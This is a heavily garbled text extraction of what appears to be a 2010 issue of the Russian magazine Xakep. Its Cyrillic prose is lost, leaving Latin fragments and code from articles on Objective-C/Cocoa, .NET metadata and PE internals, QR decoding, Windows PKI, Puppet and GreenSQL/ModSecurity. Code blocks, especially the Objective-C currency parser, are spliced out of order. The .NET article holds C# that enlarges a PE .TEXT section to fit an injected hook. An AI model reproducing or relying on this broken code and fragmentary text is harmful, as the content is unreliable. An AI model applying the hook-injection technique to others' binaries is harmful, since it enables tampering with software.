[values objectAtIndex: 0] stringValue]
forKey:[(NSXMLElement *)
[names objectAtIndex: 0] stringValue]];
}
// ,
//
return self;

//
@interface RCBDayly : NSObject
{
@private
// NSMutableDictionary map C++
NSMutableDictionary * Valutes;
}
// URL -
-(RCBDayly *) initWithContentsOfURL:(NSURL*)url;
//
// getValueForCharCode.
-(NSString *) getValueForCharCode:
(NSString *) char_code;
@end
}
//
@implementation RCBDayly
-(RCBDayly*) initWithContentsOfURL:(NSURL*) url
{
// NSObject
[super init];
// xml, URL
NSError * err = nil;
NSXMLDocument * cbr_xml =
[[NSXMLDocument alloc] initWithContentsOfURL:url
options:0 error:&err];
if (err != nil && [err code] != 0)
{
// . , ,
// XML- .
// , ,
// locolizedDescription NSError
NSLog(@"Error:%@", [err localizedDescription]);
// ,
[self release];
return nil;
}
// NSMutableDictionary
Valutes = [[NSMutableDictionary alloc] init];

//
// private- Valutes
-(NSString*) getValueForCharCode:
(NSString*) char_code
{
return [Valutes objectForKey: char_code];
}
@end
int main(int argc, char *argv[])
{
// ,
// , , [NSURL
URLWithString]
NSAutoreleasePool * pool =
[[NSAutoreleasePool alloc] init];
// RCPDayly
// URL
RCBDayly * dayly_values =
[[RCBDayly alloc] initWithContentsOfURL:
[NSURL URLWithString:
@"http://www.cbr.ru/scripts/XML_daily.asp"]];

// XML-
NSArray * nodes = nil;
// Valute XML
nodes = [[cbr_xml rootElement]
elementsForName: @"Valute"];

if (dayly_values == nil)
{
//
return -1;
}

// CharCode
// Value ()
for (int i = 0; i < [nodes count]; ++i)
{
NSXMLElement * valute =
(NSXMLElement *)[nodes objectAtIndex: i];

// ? :)
NSLog([dayly_values getValueForCharCode:@USD]);
[pool release]; // ,
// .
return 0;

NSArray * names = nil;

Apple XCode 3,
XCode 4 Apple. , , , ...

-, , . , Objective-C.

098

Objective-C , .
h, m.
, -,
, , ,
, , .
X 12 /143/ 10

>> coding
// , ,
// -
- (void) setAge: (int) age
{
Age = age;
}
- (int) getAge
{
return Age;
}
@end

Cocoa

[my_class_pointer message_name: arg1 arg2_name: arg2


arg3_name: arg3]

:
[dog1 setAge: 3];

C++ Java,
. ,
(nil). nil.
,
- ,
.
, , . Objective-C
. ,
.
Dog, :
Dog * dog1 = [[Dog alloc] init];

ObjC .

// Dog NSObject
// Dog.h
@interface Dog : NSObject
{
//
@private
int Age;
@public
int Color;
}
// ,
// .
// -,
//
// ( C++) +.
//
// ,
// .
- (void) voice;
- (void) setAge: (int) age;
- (int) getAge;
@end
// (Dog.m)
@implementation Dog
- (void) voice
{
NSLog(@"Woof woof");
}
X 12 /143/ 10

alloc NSObject.
.
,
init.
alloc init, NSObject.
init , - . init ObjC.

Cocoa Framework
Cocoa Objective-, Mac OS X .
Cocoa ObjC,
Objective-C. ocoa Linux
Windows GNUStep cocotron.

Carbon Framework
Carbon Mac OS X, C/C++.
Mac OS (, Mac OS 9).
Carbon
Mac OS X . , , GUI Carbon 64- Apple
Cocoa.

099

CODING

, ,
:
int age = [dog1 getAge];
[dog1 voce];

,
() , release:
[dog release];

ObjC .
alloc , .
release 1.
, 0. COM, .
, retain. , Objective-C 2.0, ,
. ,
(NSAutoreleasePool), autorelease. , , Cocoa
( stringByAppendingString NSString, ).
NSAutoreleasePool *pool;
pool = [[NSAutoreleasePool alloc] init];
NSString *str;
//
// pool
str = [[[NSString alloc] init] autorelease];
// ...
[pool drain]; // str

ObjC , ,
Objective-C.
.
C
(errno ).
,
.

, . , ObjC, C++,
.
ObjC:
Objective-C
Cup * cup = [[Cup alloc] init];
@try
{
[cup fill];
}
@catch ( NSException * exc )
{
NSLog ( @"Exception caught: %@", exc );
}
@finally
{
[cup release];
}

100

,
. , , .

Objective-C
.
?
, .
Cocoa Carbon.
iOS Objective-C,
Cocoa.
Cocoa NeXTSTEP
OPENSTEP, NeXT.
Mac OS X, ,
. , #
Java, NSObject.
Cocoa , NSNumber
NSString, (NSArray, NSDictionary),
..
- Cocoa Objective-C
Cocoa-.
-.
, , XML.

,
. www.cbr.ru/scripts/XML_daily.asp XML :
<ValCurs Date="22.09.2010" name="Foreign Currency
Market">
<Valute ID="R01010">
<NumCode>036</NumCode>
<CharCode>AUD</CharCode>
<Nominal>1</Nominal>
<Value>29,4185</Value>
</Valute>
...
<Valute ID="R01020A">
<NumCode>944</NumCode>
<CharCode>AZN</CharCode>
<Nominal>1</Nominal>
<Value>38,6777</Value>
</Valute>
</ValCurs>

ObjC RCBDayly,
XML,
. .
, Cocoa XML.
, , POSIX,
GUI-, Cocoa .
- .

Apple
. ,
Mac OS X iOS ,
, Objective-C
. ! z
X 12 /143/ 10

CODING
stannic.man@gmail.com

... .
, .
, 75000 ,
, JIT ...
-, 75 # ,
.

.NET

.NET-

, ,

. , ,
, 20%
GalaxyS.

, .NET . .
API- ,
. , , ,
. ,

102

WinAPI-. .NET . .NET Framework.


, , .
.NET-
, . .NET!
X 12 /143/ 10

>> coding

HTTP://WWW
links
http://reflector.
red-gate.com
.NET
Reflector,
.NET,
.

DVD
dvd

,

.NET

Metadata Expert

,
Java .NET , Java-. .NET
Framework
.
,

. , .NET,
,
. ,
.NET,
, .
.NET
(Common Language Runtime CLR).
CLR
,
.
, CLR
.NET. , .NET
.NET Framework. , (Metadata) ,
, .NET.
, CLR
.
, .

Metadata

,
, .
X 12 /143/ 10

, , ,
, .NET-. Metadata,
,
(heaps) . Microsoft .NET
: #US, #Strings, #Blob #GUID #~.
#US- ,
. ,
Print("hello"), hello
#US-.
#Strings- ,
.
#Blob- ,
, , , .
#~- ,
.NET-. , AssemblyRef, MethodRef, MethodDef,
Param. AssemblyRef
, .
MethodRef , . MethodDef
, .
Param, , , ,
MethodDef.
?, . !
, , , :).
MethodDef.
.NET-
.
RVA
(relative virtual address) , ,
, #Blob

INFO

info


Metadata
.NET-

.NET Metadata
Expert
,

Microsoft
.NET Framework.

103

CODING

TPL

LINQ

ADO.NET
Entity Framework

WPF
(Avalon)

WCS
(InfoCard)

WF
(Workflow)

.NET
Framework
2.0

Base Class Library

3.0

WCF
(Indigo)

3.5

PLINQ

Common Language Runtime (CLR)


.NET

Param, ,
. RVA
( IL-) .TEXT.
(calling
convention), ..
, rsdn.ru .NET, (http://www.rsdn.ru/article/
dotnet/refl.xml, /phmetadata.xml, /dne.xml).

(BCL)
Main() .NET-. Main()
, Main() mscorwks.dll . Mscorwks.dll
JITFunction, JIT mscorjit.dll.
IL-
native-, Main(),
.

, -! .NET. ,
,
-, .
.NET -.
,
, , ,
.TEXT. , .TEXT
.NET
.
- , ( CALL
JUMP RVA-) ,
?
CALL JUMP MSIL- () , . ,
, , .
,
.TEXT .

. :

.NET-.
.NET- :
Mscoree.dll ( .NET)
Mscorwks.dll (where most of the stuff happens)
Mscorjit.dll ( JIT)
Mscorsn.dll ( )
Mscorlib.dll (Base Class Library )
Fushion.dll (assembly binding)
.NET- . _CorExeMain,
.
_CorExeMain, , mscoree.dll,
.NET-.
Mscoree.dll _CorExeMain mscorwks.dll.
Mscorwks.dll ,
. -

104

? !

X 12 /143/ 10

>> coding

MSDOS

PE

PE-,
.NET-

(.TEXT),
Metadata

(.DATA .RSRC)


(.RELOC .RDATA)

.NET

, . , , . -,
.
-,
.
RVA MethodDef
, . .TEXT ,
.
, raw- . , , raw , .
, ,
.
, , .TEXT
0x1000,
.TEXT, . , raw- 0x200,
, .TEXT
0x200.
, .TEXT ( ),
,
.TEXT ,
. PE-. ,
, .

, , , ,
.NET-,
CLIHeader,
, , , Metadata.
- :
X 12 /143/ 10

CLIHEADER C#
FileReader Input = new FileReader(AssemblyPath);
byte[] Buffer = Input.Read();
[skip...]
ImageBase = Marshal.AllocHGlobal(Buffer.Length * 2);
HeaderOffset = *((UInt32 *)(ImageBase + 60));
PE = (PEHeader *)(ImageBase + HeaderOffset);
HeaderOffset += (UInt32)sizeof(PEHeader);
StandardHeader = (PEStandardHeader *)(ImageBase +
HeaderOffset);
RVA *CLIHeaderRVA = (RVA *)((byte *) StandardHeader
+ 208);
SectionOffset = GetSectionOffset(CLIHeaderRVA->
Address);
CLI = (CLIHeader *)(ImageBase + CLIHeaderRVA->Address
- SectionOffset);
MetaDataHeader = (MetaDataHeader *)(ImageBase +
CLI->MetaData.Address - SectionOffset);
metadata = new MetaData(Function, ImageBase,
(Int32)CLI->MetaData.Address, MetaDataHeader,
CLI->MetaData.Size);

, ,
PE-
.
.TEXT ,
, ,
PE-:
VirtualSize = TextSectionHeader->VirtualSize
+ HookSize;
RawDataSize = VirtualSize;
if ((RawDataSize % FileAlignment) != 0)
RawDataSize += (FileAlignment (RawDataSize % FileAlignment));
StandardHeader->CodeSize = RawDataSize;
HookAddress = TextSectionHeader->VirtualAddress
+ TextSectionHeader->VirtualSize;
TextSectionHeader->VirtualSize = VirtualSize;
TextSectionHeader->RawDataSize = RawDataSize;
[skip...]
StandardHeader->DataBase = DataSectionHeader->
VirtualAddress;
StandardHeader->ImageSize = SectionHeader->
VirtualAddress + SectionHeader->VirtualSize;
if ((StandardHeader->ImageSize % SectionAlignment) != 0)
StandardHeader->ImageSize +=
(SectionAlignment (StandardHeader->ImageSize % SectionAlignment));

. , 75 , , .
:). , ,
.

,
.NET , . , , RTFM .
,
, .
, .NET-
.z

105

CODING
c0n Difesa http://twitter.com/difezza, http://defec.ru



QR-


.
.
:
.
, .
-
. -
,
- .
(-, , ..)
.
,
.
, ,
( 30 ), .


-, ,
,
. ,

106

.
,
, , , ,

.

. . .

, . ,
:
1) (). ( ).
2) . :
2.1) (stacked);
2.2) (matrix).
,
. ,
X 12 /143/ 10

>> coding

INFO


Xakep Online: http://xakep.ru

PDF417.

, ,
, ,
.
QR-.
(
, , ,
)
, , . , QR
. quick response,
.

QR- . , ,
,
QR-.
QR-,
(
PrintScreen, ), , :
Xakep Online: http://xakep.ru
(
-,
..), .
QR-
, . , ,
,
, .

,

. ,
, ,
.
, QR- ,
, ,
, .
X 12 /143/ 10


.NET C#.

, . ,
.NET Framework
.
, .NET Compact Framework, , .
:
Microsoft .NET Compact Framework
.NET Framework,


.
, QR- .
.NET Framework
.

- , (
, QR).
/
. SDK
: Windows,
*NIX, Windows Mobile, Symbian iPhone (Mac OS).
Windows,
Windows Mobile SDK (.dll), .NET/VC/VB.
QRCode DataMatrix
PDF417.
,
.

, ,
, QR-.
, ,

info
,
, QR-:
7089

( )
4296

2953
1817

HTTP://WWW
links
http://www.partitek.
com/
-
SDK.
http://qrcoder.ru/

QR-.
http://www.xakep.
ru/magazine/
xa/084/056/2.asp


-.
http://defec.ru
,

.

DVD
dvd

107

CODING

-,

: , , ,
. PTIMAGE.
,
unsafe public struct PTIMAGE
{
public int dwWidth;//
public int dwHeight;//
public byte* pBits;//

public byte* pPalette;//


(1,4,8 )
public short wBitsPerPixel; //
}

SDK .
,
, .
,
, SDK.
.
PTDECODEPARA:
PTDECODEPARA
public unsafe struct PTDECODEPARA
{
public int dwStartX;// X
public int dwStartY;
public int dwEndX;
public int dwEndY;
public int dwMaxCount;//
; 0,

};

dwMaxCount, ,

108

QR- ,

.
, :
PTBARCODEINFO

public unsafe struct PTBARCODEINFO
{
/* */
public int dwX1, dwY1;
public int dwX2, dwY2;
public int dwX3, dwY3;
public int dwX4, dwY4;
public byte* pData; // ,

public int dwDataLen; // ( )

};

QR-,

, ,
QR-.
, , :
static void Main(string[] args)
{
PtQRDecodeRegister("12345678901234567890");//

PtInitImage(ref image); //

if (OpenFileDlg.FileName != "")
{
FileName = OpenFileDlg.FileName;
DecodeQR();
}

}
X 12 /143/ 10

>> coding


QR-

, DecodeQR(), QR- ,
, , ,
:

. - .
QR-
;
QR-
.
3D : QR-
.
, , .
,
/.

static private void DecodeQR()


{

/*
*/
if (PtLoadImage(FileName, ref image, 0) ==
PT_IMAGERW_SUCCESS)
{
if (PtQRDecode(ref image, ref DecodePara,
ref BarCodeInfo) != PT_QRDECODE_SUCCESS)
MessageBox.Show("An error occured while
rocognition ");
else
ShowBarCodeInfo(ref BarCodeInfo);//
-
}

}
// -,
QR-
static public unsafe void ShowBarCodeInfo(
ref PTTOTALBARCODEINFO BarCodeInfo)
{
if (BarCodeInfo.dwTotalCount <= 0)
{
MessageBox.Show("No barcode was found");
return;
}
string str = "";
//
{
str = str+Encoding.Default.GetString(byteArray);
//Encoding.GetEncoding("GB2312").GetString
str = str + "\n\n";
}
str = str + \0;
MessageBox.Show(str);
}
X 12 /143/ 10

.Decode()

QR-
.
( -
, -
, , .)
, , .

, ,
.

. , , , - (, ,
, QR-, ), QR- , .

, .
, . ,
QR- - . ,
, , . , .z

109

CODING
deeonis deeonis@gmail.com

,
. .
, ,
,
.
; , ,
BAD-DOMAIN.COM, , .
, ,
.
. , , ,
.

.

aka

, ,
.
, ,
, , .
.
m 0 n.
, , ,
m, ,
, m.
,
. :

int LinearSearch (int *array,
size_t arraySize, int key)
{
for (size_t i = 0; i < arraySize; i++)
if (array[i] == key)
return array[i];
//
return -1;
}

, n ,
. , O(n). ,
.
. ,

110

,
. , . :

cookie.
- .
.
- .

. , ,
.

, -: ,
3000 , 3000 ,
3000*3000=9 000 000 . ,
,
, , .


. .
O(log n).
10 431 (log(3000)
* 3000 = 10431.4). 863 ,
. , !
20% - Opera Google Chrome
. -?
, , , .
, aaa < aab < baa
< bba < bbb < bbc < caa...
.
.
.
, , . ,
n ,
n/2.
,
, .
, .
:
X 12 /143/ 10

.

int CCookieRemover::lowerbound(const CStringArray& a,
const int& n, const CString& t)
{
int result;
int l;
int half;
int first;
int middle;
l = n;
first = 0;
while(l>0)
{
half = l/2;
middle = first+half;
if( a[middle]<t )
{
first = middle+1;
l = l-half-1;
}
else
{
l = half;
}
X 12 /143/ 10

}
result = first;
return result;
}

.
,
, .
,
.
, 10 000
. ,
, .

, .


() . , , , .
.
. , .

111

CODING


,
. ,
. ,
, . , , ,
. , X
X, .
{data, left, right}. data , left right
.
. data
,
.
. , K T
:

1. , , ,
;
2. , K X:
2.1. K = X,
;
2.2. K > X, K
;
2.3. K < X, K .


.
,
. , K T n, :

1. T , ;
2. , K X
n;
2.1. K > X, K
;
2.2. K < X, K ;
2.3. K = X, :
2.3.1. ,

112

;
2.3.2. ,
m , ,
, m;
2.3.3. , :
2.3.3.1. m,
Right(n);
2.3.3.2. Left(m) Left(n);
2.3.3.3. n Parent(n)
Right(n);
2.3.3.4. , n.

, , .
. , ,
,
. ,
, .
.

, .
, . , ,


. z

,
, .
, ,
.
.

C
. , , , ,
.

X 12 /143/ 10

, !

- Amazon.com , , . ,
. : e-ink reader
. 7 ,
Wexler.

Epson Display
6
800 600

E-Ink 16
.


,

.


Wexler

. ,
FM

.


2
,

micro-SD
10 . Li-ion
1500 mAh


11 . .



. Wexler

FB2, EPUB, PDF,
HTML, TXT. ,

,
.


.


.




.

7000 .


: ARM9
: TXT, EPUB, RTF, HTM, HTML, PDF, Fb2
: JPG, JPEG, BMP, GIF
: mp3 (32kbps-384kbps), wma (32kbps192kbps)

:
: 65x126,5x9,5
: 215
www.wexler.ru

SYN/ACK
luchnik@it-university.ru



Windows Server 2008.
IT , .
, . -
,
. PKI
, ,
.

Windows Server 2008.

, ,
, ,
, , ,
, .
; , , .
, ,
: , ,
, ,
, .
.
X.509, . , ,
.
(Public Key Infrastructure (PKI))
,
, .
, PKI, :
, , ;
, , .
PKI,
.
(Certificate Policy) (Certificate
Practice Statements) .
,
,

114

, , .
,
(, HSM Hardware Security Module).
, , ( ).
.

,
, .
,
, . , ,
e-mail,
.
, .
,
,
-.
,
. ( ,
) .
.
, ,
,
.
,

.
X 12 /143/ 10

,
,
, OCPS (Online Certificate Status Protocol).
,
OCSP responder
. ,
,
, (
, ,
, -- ).

PKI . ,
. , ,
HTTPS.
, ,
, . SSL-. ,
,
, , ,
.
, .

. ,
- ? , ,

. ? :
,
.
.
, 1
1, 1.
,
PKI,

,

X 12 /143/ 10

. ,
,
, Konqueror Google Chrome.
,
, .
,
.
SSL-
- . , ,
.
- ( 1
2 ),
.
( ):
(Bridge CA Model).
() , .

-.
US governments Federal Bridge Certification Authority.
, n2
-. -
, .
, , ,
. , . ,
() ,
, . ,

.
, .

,
. Windows Server 2008
Active Directory
Certificate Services.
.

115

SYN/ACK


(Enterprise Standalone)
. , Enterprise CA
. Standalone
, , .
Standalone , Offline Root CA,
.
Root CA Subordinate CA. Root CA
, Subordinate CA .
, , .
: ,

WinXP SP2 Server 2003 SP2 SHA2 ,


Server 2003 SP2
KB938397,
Windows Update,
.

.
,
. Windows Server 2008 R2
,
, ,
,
.
, , ,
Offline, .
Standalone CA.

, ,
.
,
. ,
.
AIA CDP
,
. (Certificate
Revocation List (CRL)) CRL
Distribution Points (CDP) Authority Information Access (AIA) -

116

AD CS

AD CS
. ,
, (, HTTP,
LDAP FTP).

,
,
, , .
, . ,
,
, ,
,
, ,
.
, .
,
(data recovery agent).

.

(key
recovery agent),
.
X 12 /143/ 10

.
1-2 , Subordinate Issuing CA 5 ,
NAP , .

, , ,
.
, .
,
PKI. 4096
, , , , , .
,
. ,
,
, ,

.
( )
( ).
.
, , ,
().
, .
, ,
.
.
,

, . .

. , -
, , ,
.
(, CBC-MAC
HMAC), ,
, ,
.
,
, ,
. ,
,
, .
X 12 /143/ 10

AIA CDP
.
, ,
,
. ,
SHA1 ,
- , SHA2. , WinXP SP2
Server 2003 SP2 SHA2 ,
Server 2003 SP2 KB938397,
Windows Update, .

,
, Windows
Server 2008.
,
, . ,
,
.

. , ,
.
.
, .
, :
Issuing CA , Certpublishers
.
HSM-,
.
Enterprise Admin AD.
Stand-Alone Root CA,
Offline, CAPolicy.Inf,
AIA CDP
.

117

SYN/ACK
NATHAN BINKERT / NAT@SYNACK.RU /

. 2


http://
technet.microsoft.com/en-us/library/cc780454(WS.10).
aspx
A.K. Lenstra, E.R. Verheul
Selecting
cryptographic key sizes (http://www.win.tue.
nl/~klenstra/key.pdf). http://www.keylength.
com/en/ ,
, ,
.
PKCS (http://www.rsa.com/rsalabs/node.
asp?id=2124) X.509 (http://www.itu.int/rec/T-RECX.509/en)
, CApolicy.inf http://
blogs.technet.com/b/askds/archive/2009/10/15/windowsserver-2008-r2-capolicy-inf-syntax.aspx
PKI
whitepapers Windows PKI blog http://blogs.
technet.com/b/pki/

. !

3.
CRL
CAPolicy.Inf
CRLPeriodUnits = 60
CRLPeriod = Days
CRLOverlapUnits = 1
CRLOverlapPeriod = Weeks
CRLDeltaPeriodUnits = 0
CRLDeltaPeriod = Hours

.
,
, , . CAPolicy.Inf %SystemRoot%,
.
:
CDP AIA ,
,
. Extensions
Certification Authority. CRL,

118

X 12 /143/ 10

1. CAPolicy.Inf

[Version]
Signature= "$Windows NT$"
[Certsrv_Server]
RenewalKeyLength=2048
RenewalValidityPeriod=Years
RenewalValidityPeriodUnits=20
[CRLDistributionPoint]
[AuthorityInformationAccess]

2.
CRL
certutil
certutil
certutil
certutil
certutil
certutil
certutil

-setreg
-setreg
-setreg
-setreg
-setreg
-setreg

,
.z

CA\CRLPeriodUnits 60
CA\CRLPeriod "Days"
CA\CRLOverlapUnits 1
CA\CRLOverlapPeriod "Weeks"
CA\CRLDeltaPeriodUnits 0
CA\CRLDeltaPeriod "Hours"

Bridge A

A
, Include in the CDP
(AIA) extension of issued certificates .
CDP AIA certutil.
.
CRL ,
online, CRL ,
CDP. CRL
Revoked Certificates Certification Authority certutil ( 2)
CAPolicy.Inf [certsrv_server] ( 3).
, .
, , .
.
Issuing Enterprise CA, Stand-Alone Root CA.
.
,
, Certification Authority Submit new request
Action .
,
Pending Requests. .
,
, , .

A
-

, PKI, ,
,
X 12 /143/ 10

119

SYN/ACK
zobnin@gmail.com

Master
of puppets


Puppet

UNIX- Cfengine,
.
, Cfengine, ,
Puppet.
,
- ,
UNIX.
, ,
, .
, ,
- . :
?
SSH
. . -,
. -, (,
OpenOffice.org ,
).
, ,

. .
, ;

, ,
. , .

, Cfengine Puppet.

,
(,
, ,
,
..).

.
,
.

Puppet?

Cfengine,
Puppet, . Puppet
(Luke Kanies), Cfengine
. Cfenfine,
Puppet .

120

Puppet ,
,
. Puppet
, , ,
(, ,
, , ,
). Puppet Ruby,

( ).
, Cfengine,
, Puppet , ,
.
Puppet . Cfengine,
UNIX- ( MacOS X),
Cygwin Windows. Ruby Factor,
(
, Cfengine ).

Cfengne, Puppet - ,
.
( Puppet
) . ( )
,
, , /
, ,
. ,
, ,
( , ). Puppet ,
. ,
Debian/Ubuntu Puppet :
$ sudo apt-get install puppet

:
$ sudo apt-get install puppet puppetmaster
X 12 /143/ 10


/etc/puppet.
/etc/puppet/manifests/site.pp,
.

.
:
# vi /etc/puppet/manifests/site.pp
class passwd {
file { "/etc/passwd":
owner => root,
group => root,
mode => 644,
}
}
node default {
include passwd
}

, /etc/passwd root,
644.
.
/etc/puppet/puppet.conf.
,
,
Puppet. Ubuntu .
:

# (
)
pluginsync=true
# ( )
templatedir=$confdir/templates
# etckeeper
# ( , )
prerun_command=/etc/puppet/etckeeper-commitpre
postrun_command=/etc/puppet/etckeeper-commitpost


, , :
$ sudo puppetmasterd -genconfig > /etc/puppet/
puppetd.conf.default

HTTP://WWW
links
http://docs.
puppetlabs.com
Puppet
http://docs.
puppetlabs.com/
guides/language_
tutorial.html
Puppet
http://docs.
puppetlabs.com/
references/stable/
type.html

$ sudo puppet -genconfig > /etc/puppet/puppetd.


conf.default

fileserver.conf auth.conf
(
) .
.
Puppet :
$ sudo /etc/init.d/puppetmaster restart

# vi /etc/puppet/puppet.conf
[main]
#
logdir=/var/log/puppet
vardir=/var/lib/puppet
ssldir=/var/lib/puppet/ssl
rundir=/var/run/puppet
# Facter,
#
factpath=$vardir/lib/facter
#
X 12 /143/ 10


.


.
Puppet
,
(,
shmux):

121

SYN/ACK

,
Puppet

facter

$ sudo puppetd -server puppet-.com -verbose -test

,
:
$ sudo puppetca --list

:
$ sudo puppetca --sign nomad.grinder.com

PuppetLabs

:
$ sudo puppetca --sign --all

. Puppet- (
puppet):
$ sudo su
# echo '[puppet]' >> /etc/puppet/puppet.conf
# echo 'server=puppet-.com' >> /etc/puppet/puppet.conf
# exit

. /etc/passwd .
file ,
. owner => "root"
owner root, ,
(owner) .

, -, .
.
.
/etc/group, /etc/passwd ( - require):

:
$ sudo /etc/init.d/puppet start

, Puppet
,
,
, . , , ,
. bash, Puppet.
, ,
. ,
/etc/passwd:
# vi /etc/puppet/manifests/site.pp
file { "/etc/passwd":
owner => "root"
}

file . ,
, , ,

122

# vi /etc/puppet/manifests/site.pp
file { "/etc/group":
require => File["/etc/passwd"],
owner => "root",
}

, /etc/group ( ) ,
/etc/passwd.
, . ,
. ,
- nginx
:
# vi /etc/puppet/manifests/site.pp
class nginx {
package { "nginx":
ensure => installed
}
service { "nginx":
ensure => running,
require => Package["nginx"],
X 12 /143/ 10

INFO

package
nginx , service . require
, . ,
:

info
Puppet
HTTP,



-.

# vi /etc/puppet/manifests/site.pp
service { "squid":
ensure => running,
require => Class["nginx"],
}

-,
:

Puppet
# vi /etc/puppet/manifests/site.pp
class passwd {
file { "/etc/passwd":
owner => "root",
group => "root",
}
}
class passwd-bsd inherits passwd {
File["/etc/passwd"] { group => "wheel" }
}

passwd-bsd passwd ,
group /etc/passwd (
BSD- /etc/passwd wheel, ).

.
, Puppet
. $
, (true, false):
$want_apache = true
$apache_version = "2.2.14"

Puppet,
, facter.
, ,
-, Puppet .
Puppet
.
, passwd
( ):
# vi /etc/puppet/manifests/site.pp
file { "/etc/passwd":
owner => "root",
group => $kernel ? {
Linux => "root",
FreeBSD => "wheel",
},
}
X 12 /143/ 10

,
, group
root, wheel. ,
Puppet case,

:
# vi /etc/puppet/manifests/site.pp
case $operatingsystem {
redhat: { service { "httpd": ensure => running }}
debian: { service { "apache": ensure => running }}
default: { service { "apache2": ensure =>
running }}
}


service (
Linux , , Puppet,
).
default ,
.
file, package service, Puppet , . ,
, ,
http://docs.
puppetlabs.com/references/stable/type.html.
:
Puppet
cron cron
exec
file
filebucket
group
host /etc/hosts
interface
mount
notify - Puppet
package

Puppet


.
Puppet,

(pxe-install) ,

,



.
Puppet
, Google,
Fedora Project,
Stanford University,
Red Hat, Siemens IT
Solution
SugarCRM.

WARNING
warning

Puppet
8140,

.

, Puppet


,
Cfengine, (
20 ).

123

SYN/ACK
NATHAN BINKERT / NAT@SYNACK.RU /

service
sshkey SSH
tidy
user
zones Solaris

Puppet
(nodes). ,
. ,
, Puppet.
:
# vi /etc/puppet/manifests/site.pp
node default {
include passwd
}

default, /
passwd. default , /
passwd, - ,
. include
,
, . default (
),
(
). ,
, Puppet, (-
NTP-):
# vi /etc/puppet/manifests/site.pp
# SSH-
class sshd {
package { openssh-server: ensure => installed }
service { sshd:
name => $operatingsystem ? {
fedora => "sshd",
debian => "ssh",
default => "sshd",
},
enable => true,
ensure => running,
}
}
# Apache
class httpd {
package { httpd: ensure => installed }
service { httpd:
enable => true,
ensure => running,
}
}
# NTP-
class ntpd {
package { ntp-server: ensure => installed }
service {
ntp-server:
enable => true,
ensure => running,
}
}
# , -

124

node base {
include sshd
}
# , -
node web.server.com inherits base {
inlude httpd
}
# NTP-
node ntp.server.com inherits base {
include ntpd
}

: Apache web.server.com
NTP- ntp.server.com. SSH-.
;
, , Puppet.
Puppet.
,
( , Puppet ,
).


.
, - Apache, ,
, .
, Puppet
.
/etc/puppet/fileserver.
conf. Puppet , :
# vi /etc/puppet/fileserver.conf
[files]
path = /var/puppet/files
allow *.server.com

, /var/puppet/files
server.com. ,
IP-,
deny.

file. :
# vi /etc/puppet/manifests/site.pp
file { "/etc/httpd/conf/httpd.conf":
source => "puppet://httpd/httpd.conf",
mode => 644,
}

httpd.conf, /var/puppet/
files/httpd, ,
.


Puppet. ,
. , Puppet
, ,
.!z
X 12 /143/ 10

WEXLER.HOME 903

>> coding


,
( , ). , ,
. handycraft' , . ,
,
.
. WEXLER.HOME 903 64- Windows 7
, .

. , , ,
.

. WEXLER.HOME
750 . ,
, .

WEXLER.HOME 903
Windows 7 .
64- :
4
. ,
Microsoft Office starter ( Word Excel)
Microsoft Security Essentials.

Intel Core i5-650 3,2 - 4 . CPU



Turbo Boost, (, ). , .

GeForce GTX 460,


Fermi.
DirectX 11 GTX 460 , NVIDIA 3D
Vision, PhysX CUDA
, .
.

WEXLER.HOME 903
4 , .

Windows 7.

WEXLER
Wexler:
+7 (800) 200-9660
www.wexler.ru
Microsoft Windows 7, / ,
Microsoft.

SYN/ACK
grinder grinder@tux.in.ua


-
,
, .
( )
. .
, , .
, .

GreenSQL-FW

-
- , .
(XSS, SQL-injection, XPath-injections, CSRF/XSRF,
HTTP Response Splitting, Include- )
,
.
, -
. , .
,
,
, . ,
AppArmor, SELinux TOMOYO Linux (][ 08.2010),

. .
GreenSQL-FW (greensql.net), ,
- - SQL-,
SQL- SQL-,
(DROP, CREATE ..).
GreenSQL,
DELETE, UPDATE INSERT,
, ID . ,
. ,
,
: , , TRUE,
, OR, .
, .
GreenSQL :
Simulation Mode (IDS), SQL-
;
Blocking Suspicious Commands ,
(IPS) ,
;
Active protection from unknown queries (db firewall);

126

Learning mode , .

Learning mode, GreenSQL
Active protection.
: Community, Light
Pro. ( GNU GPL)
, MySQL PostgreSQL
( 1.2) Linux. ,
, MS SQL Server
Win2k3/2k8.

, CMS , . GreenSQL , SQL-, .
GreenSQL 127.0.0.1:3305,
SQL- MySQL
127.0.0.1:3306.
.
-.
.
GreenSQL Community.
Ubuntu, RHEL/CentOS 5,
Fedora, Debian, SLE/openSUSE Mandriva. Ubuntu
: deb-, ,
:
$ sudo dpkg -i greensql-fw_1.2.2_amd64.deb

, GreenSQL, IP- , , root,


, .

. , ,
:
$ sudo dpkg-reconfigure greensql-fw

, greensql-create-db.
GreenSQL /etc/
greensq. greensql.conf
X 12 /143/ 10

,
.

,
, (/var/log/
greensql.log) .
,
.
, GreenSQL, : 3305 , 3306,
MySQL.

$ sudo nano /usr/share/greensql-fw/config.php


$db_type = "mysql";
$db_host = "localhost";
$dbport=3306
$db_name = "greendb";
$db_user = "green";
$db_pass = "pwd";

mod_alias -:
$ sudo a2enmod alias
$ sudo service apache2 restart

$ mysql -h 127.0.0.1 -P 3305 -u root -p

, , , show databases
.
, ,
3305, ,
GreenSQL 3306,
3305.
.
-. ,
/etc/greensql/greensql-apache.conf :
$ sudo nano /etc/apache2/apache2.conf
Include /etc/greensql/greensql-apache.conf

greensql-apache.conf :
$ sudo nano /etc/greensql/greensql-apache.conf
#
<IfModule mod_alias.c>
Alias /greensql "/usr/share/greensql-fw"
</IfModule>

templates_c:
$ sudo chmod 0777 /usr/share/greensql-fw/
templates_c

config.php
:
X 12 /143/ 10

-, admin pwd.


ModSecurity
- , ,
-. ,
. WASC (Web Application Security Consortium, webappsec.
org) ,
,
-, . , WASC
, . - ModSecurity
(modsecurity.org) WebDefend (breach.com) ,
, . , . (
2003 ) OpenSource-,
.
ModSecurity -
Apache 2.0/2.2,
.
, .

, ,
, .
ModSecurity

HTTP://WWW
links

GreenSQL-FW
greensql.net
WASC
webappsec.org
ModSecurity
modsecurity.org
OWASP
ModSecurity ore
Rule Set owasp.
org/index.php/
Category:OWASP_
ModSecurity_Core_
Rule_Set_Project
suPHP
suphp.org

htscanner pecl.
php.net/package/
htscanner

Suhosin hardenedphp.net/suhosin

127

SYN/ACK

GreenSQL

- . ,
, ModSecurity.
ModSecurity
, . , OWASP ore Rule
Set (CRS, owasp.org/index.php/Category:OWASP_ModSecurity_Core_
Rule_Set_Project),
- (0-day)
. CRS HTTP, ,
,
. Rules
Subscription Service. ClamAV.
( ) ,
Enhanced Rule Set (ERS),
(IIS, Outlook Web Access .),

PCI DSS (Payment Card Industry Data Security Standard),


.
ModSecurity 2.5.12,
,
